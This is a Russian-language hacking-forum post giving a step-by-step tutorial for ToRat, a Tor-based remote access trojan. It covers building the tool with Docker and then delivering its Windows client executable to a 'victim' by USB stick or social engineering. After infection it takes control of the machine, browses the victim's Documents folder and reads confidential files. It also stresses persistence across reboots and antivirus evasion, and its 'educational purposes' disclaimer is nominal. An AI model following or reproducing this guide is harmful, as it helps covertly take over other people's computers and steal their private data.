Как нагнуть систему Windows 10 с TORAT?

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 2K
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Салом КулХацкер! ФСБ на связи!

Статья не несет ответственности за ваши действия.Она для в ознакомительных целях.Никто вас не побуждает взламывать.



ToRat — это инструмент удаленного администрирования. Используя этот инструмент, мы можем взломать компьютер жертвы, если у него нет какой-либо защиты от вирусов на его компьютере. Этот инструмент ToRat полностью построен на языке Go с использованием транспортной машины TOR. Согласно этическому исследователю хакерских атак, он может обойти АВ-защиту. Мы можем запустить этот инструмент в операционных системах клиентов Windows, Linux. Мы можем использовать этот инструмент в образовательных целях.



Перед установкой инструмента мы должны установить docker-engine.





Скрытый контент для авторизованных пользователей.



Установка докера

Здесь мы покажем, как установить docker-engine в нашу ОС.



Наберите эту команду для обновления пакетов:



sudo apt-get update



Затем используйте эту команду для установки пакетов:



sudo apt-get install \

apt-transport-https \

ca-certificates \

curl \

gnupg-agent \

software-properties-common



Теперь введите эту команду в терминале, чтобы добавить официальный ключ GPG в Docker.



curl -fsSL
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
| sudo apt-key add –



Теперь мы должны проверить ключ с помощью отпечатка пальца, который у нас есть 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88 путем поиска по последним 8 символам отпечатка пальца.



sudo apt-key fingerprint 0EBFCD88



Далее, введите эту команду для настройки стабильного хранилища:



sudo add-apt-repository \



Теперь используйте эту команду для установки последней версии Docker-Engine.



sudo apt-get install docker-ce docker-ce-cli containerd.io



Теперь, проверьте сообщество движка докеров с помощью этой команды:



sudo docker run hello-world



Установка ToRat

Наберите в терминале эту команду для клонирования инструмента:



git clone
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!




Наберите команду cd для входа в каталог.



cd ToRat/



Введите эту команду для создания Docker-контейнера ToRat:



sudo docker build . -t torat



Исполнения инструмента

Затем введите эту команду в терминале для запуска контейнера:



sudo docker run -it -v “$(pwd)”/dist:/dist_ext torat










1592189067400.png




Чтобы найти параметры, введите команду help




1592189149700.png




Основной шаг инструмента - получить доступ к компьютеру жертвы, отправив файл .exe. Мы находим файл .exe по этому пути.



/home/iicybersecurity/ToRat/dist/dist/client# ls



Загрузите файл client-windows-4.0-amd64.exe и отправьте этот файл жертве через Pendrive или некоторые методы социальной инженерии.



Когда жертвы запускают этот .exe файл на своей машине. Таким образом, мы можем видеть в машине наших серверов новый подключенный клиент.



Здесь мы увидим, что происходит, когда жертва запустила файл .exe в машине Windows.



Используйте команду list, чтобы проверить, подключен ли клиент к серверу, или мы можем сказать, что созданная BOT может быть перечислена с этой опцией.




1592189237700.png


Здесь мы перечислили список клиентов.



Теперь используйте команду select и номер из списка клиентов. Для доступа к машине жертвы. Выберите 0 и затем нажмите Enter




1592189276900.png




Здесь мы идем к машине доступа жертв.



Теперь давайте попробуем открыть любой документ, содержащий конфиденциальную информацию, на компьютере жертвы.



Теперь мы находимся на компьютере жертвы. Введите команду dir, чтобы проверить каталоги на компьютерах жертв.




1592189322700.png






Здесь мы нашли каталог с названием Documents.



Теперь давайте войдем в папку «Documents» с помощью команды cd Documents и проверим информацию жертвы




1592189362300.png




Здесь мы видим информацию о жертве и таким же образом мы также можем просматривать документы, просто вводя имя файла с помощью команды type.



Мы видим полную информацию, которая является очень конфиденциальной, которая может быть использована для любой незаконной деятельности.



Основным преимуществом использования этого инструмента является то, что мы можем получить доступ к компьютеру жертвы в любое время при перезагрузке, запустив процесс backdoor при запуске. Таким образом, в процессе цифровой криминалистики, процессы BOT также идентифицированы.



Инструмент для взлома ToRat (Remote Administrator Tool), который работает через сеть TOR для доступа к ботам. В этом инструменте, отправив один .exe-файл жертве, обычная система может быть преобразована в BOT для работы зомби.

Всем спасибо за прочтение статьи ребят.С вами как всегда я ФСБ! Поднимаем актив подписываемся на канал приглашаем друзей. Подписывайтесь на мой телеграм канал
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

А также на мой профиль в HHIDE . Всем спасибо огромное за поддержку!
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя